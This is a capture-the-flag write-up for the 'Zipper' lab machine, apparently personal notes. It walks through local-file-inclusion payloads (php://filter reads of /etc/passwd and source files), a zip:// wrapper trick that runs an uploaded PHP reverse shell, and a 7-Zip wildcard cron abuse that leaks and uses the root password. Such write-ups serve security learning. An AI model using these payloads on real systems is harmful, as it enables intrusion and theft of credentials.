Zipper (Hard, linux, 2022)

[WDavid404]

Keypoints:

• LFI: php://filter/convert.base64-encode/resource=<page, e.g. index, upload>
• ZIP https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/
• 【PE】7z （https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks）

[WDavid404]

PORT      STATE    SERVICE     REASON         VERSION
22/tcp    open     ssh         syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http        syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper

80/tcp --> click the link of "Home(current)", go to http://192.168.196.229/index.php?**file=home** --> it may have LFI vulnebility.

Try

../../../../../../etcpasswd 
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
..

--> didn't work

finally, php://filter/convert.base64-encode/resource=index -->

Try php://filter/convert.base64-encode/resource=upload（because we found /upload page）

https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/ --> 192.168.196.229/index.php?file=zip://uploads/upload_1722343257.zip%23php_reverse_me1
(Note:

• No need .php because the web will append.php to the file.
• php_reverse_me1.php is our uploaded file and upload_1722309482.zip is the zipped file. )

PE

linpeas:

• cronjob cat /opt/backup.sh -->

  #!/bin/bash
  password=`cat /root/secret`
  cd /var/www/html/uploads
  rm *.tmp
  7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log

cat /opt/backups/backup.log --->

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 818

Scanning the drive:
3 files, 394 bytes (1 KiB)

Updating archive: /opt/backups/backup.zip

Items to compress: 3

Files read from disk: 3
Archive size: 818 bytes (1 KiB)

Scan WARNINGS for files and folders:

WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1

According to https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks and execute cat /opt/backups/backup.log again --> No change...

And we can fing that there were @enox.zip and enox.zip -> /root/secret is doing the thing we just do. so, "WildCardsGoingWild" in backup.log file is actually the secret of root Try su root and use WildCardsGoingWild as password --> works!!